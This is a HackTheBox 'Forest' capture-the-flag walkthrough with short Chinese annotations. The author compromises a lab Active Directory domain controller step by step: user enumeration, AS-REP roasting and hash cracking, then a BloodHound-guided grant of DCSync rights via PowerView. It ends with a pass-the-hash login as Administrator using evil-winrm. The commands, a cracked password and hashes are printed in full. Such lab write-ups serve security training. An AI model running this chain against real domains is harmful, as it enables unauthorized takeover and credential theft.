HackTheBox-Forest

image-20220328111737416

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
nmap -p- -sS -Pn -sV -sC 10.129.95.210


53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 03:18:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-03-27T20:53:39-07:00
| smb2-time:
| date: 2022-03-28T03:53:40
|_ start_date: 2022-03-28T03:06:33
|_clock-skew: mean: 2h26m50s, deviation: 4h02m32s, median: 6m48s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

rpcclient 获取用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
rpcclient -U "" -N 10.129.95.210

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kerbrute userenum --dc 10.129.95.210 -d htb.local username

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/28/22 - Ronnie Flathers @ropnop

2022/03/28 06:42:11 > Using KDC(s):
2022/03/28 06:42:11 > 10.129.95.210:88

2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected].local
2022/03/28 06:42:11 > [+] VALID USERNAME: [email protected]

NPU

1
2
3
4
5
6
7
8
9
10
11
12
impacket-GetNPUsers htb.local/ -dc-ip 10.129.95.210 -request -no-pass -usersfile a.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:5a15690edeca3ca535a84b1689dcd453$671459d5fd66b293f9cca612833bc09e6d2133e8c4a3ff5c0ae43aae9021b67026c2add8949e9745febb2beedf935f2dedb4a0c7c0c550ad8387dc9f1a45ff9554189a58497cd70e35fd3eba797df7cc7c3529411ac7c02046c935bcb8efecfbf3114e98652653d9e24a874123dbdc608eb14ffff5d55523ed4ec7987bdb4c2a511e548aa03bb1f9c0c1781f0639321931f76130130af439e9b493835ec669aef60e3c12c1d8cd79dd8c10c7f3f33fb814d744c55dd8b4f1800f99bfd1db767e22471c43835e8aacfc6b3b4425a5b42a02ddd16ca370de92c382b40de263b1606f594fadceb0
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

破解

1
hashcat -m 18200 hash.txt rockyou.txt
1
[email protected]:5a15690edeca3ca535a84b1689dcd453$671459d5fd66b293f9cca612833bc09e6d2133e8c4a3ff5c0ae43aae9021b67026c2add8949e9745febb2beedf935f2dedb4a0c7c0c550ad8387dc9f1a45ff9554189a58497cd70e35fd3eba797df7cc7c3529411ac7c02046c935bcb8efecfbf3114e98652653d9e24a874123dbdc608eb14ffff5d55523ed4ec7987bdb4c2a511e548aa03bb1f9c0c1781f0639321931f76130130af439e9b493835ec669aef60e3c12c1d8cd79dd8c10c7f3f33fb814d744c55dd8b4f1800f99bfd1db767e22471c43835e8aacfc6b3b4425a5b42a02ddd16ca370de92c382b40de263b1606f594fadceb0:s3rvice
1
2
3
./aclpwn-env/bin/bloodhound-python  -c ALL -u svc-alfresco -p s3rvice -d HTB.local -dc forest.HTB.local -ns 10.10.10.161 --dns-timeout 20

也可以用bloodhound.exe进行收集

最短路径到域控,svc-resco是服务帐号,可以添加用户到exchange windows permissions组,而这个组的用户可以写dcsync acl。实现抓ntds.dit

image-20220405223025124

使用powerview.ps1

1
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Credential $Cred
1
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

image-20220405151626637

1
$user="htb\svc-alfresco";$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($user, $SecPassword);Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Credential $Cred;net user svc-alfresco;Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync ;net user svc-alfresco;

直接登录完事

1
evil-winrm -i 10.10.10.161 -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'
1
a2cd87c0f5dd7e6d0317e5bc6b793142